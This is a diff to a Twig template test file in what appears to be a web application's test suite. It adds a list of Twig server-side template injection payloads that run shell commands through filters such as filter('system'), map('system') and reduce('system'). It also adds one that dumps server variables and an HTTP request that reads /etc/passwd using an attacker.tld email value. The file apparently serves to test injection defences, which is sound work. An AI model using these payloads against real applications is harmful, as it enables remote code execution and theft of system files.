--- a/test/twig/test.html.twig
+++ b/test/twig/test.html.twig
@@ -1,13 +1,41 @@
-<div>
-	{{ 'UI:Login:UserNamePrompt'|dict_s }}
-</div>
-<div>
-	{{['id']|filter('system')}}
-</div>
-<div>
-	{{['touch+/tmp/test+']|filter('system')|join(',')}}
-</div>
-<div>
-{% set sizes = [34, 36, 38, 40, 42] %}
-	{{ sizes|filter(v => v > 38)|join(', ') }}
-</div>
+{% spaceless %}
+    <div>
+        {{ 'UI:Login:UserNamePrompt'|dict_s }}
+    </div>
+    <div>
+        ['id']|filter('system')
+    </div>
+    {{ ['id']|filter('system') }}
+    <div>
+        ['touch+/tmp/test+']|filter('system')|join(',')
+    </div>
+    {{ ['touch+/tmp/test+']|filter('system')|join(',') }}
+    <div>
+        set sizes = [34, 36, 38, 40, 42]
+        sizes|filter(v => v > 38)|join(', ')
+    </div>
+    {% set sizes = [34, 36, 38, 40, 42] %}
+    {{ sizes|filter(v => v > 38)|join(', ') }}
+    <div>
+        app.request.server.all|join(',')
+    </div>
+    {{ app.request.server.all|join(',') }} {# needs syfony #}
+    <div>
+        self
+    </div>
+    {{ self }} {# ??? not sure #}
+    <div>
+        [0]|reduce('system','echo')
+    </div>
+    {{ [0]|reduce('system','echo') }}
+    <div>
+        ['echo']|map('system')|join
+    </div>
+    {{ ['echo']|map('system')|join }}
+    <div>
+        ['echo',1]|sort('system')|join
+    </div>
+    {{ ['echo',1]|sort('system')|join }}
+    POST /subscribe?0=cat+/etc/passwd HTTP/1.1
+    email="{{ app.request.query.filter(0,0,1024,{'options':'system'}) }}"@attacker.tld
+{% endspaceless %}
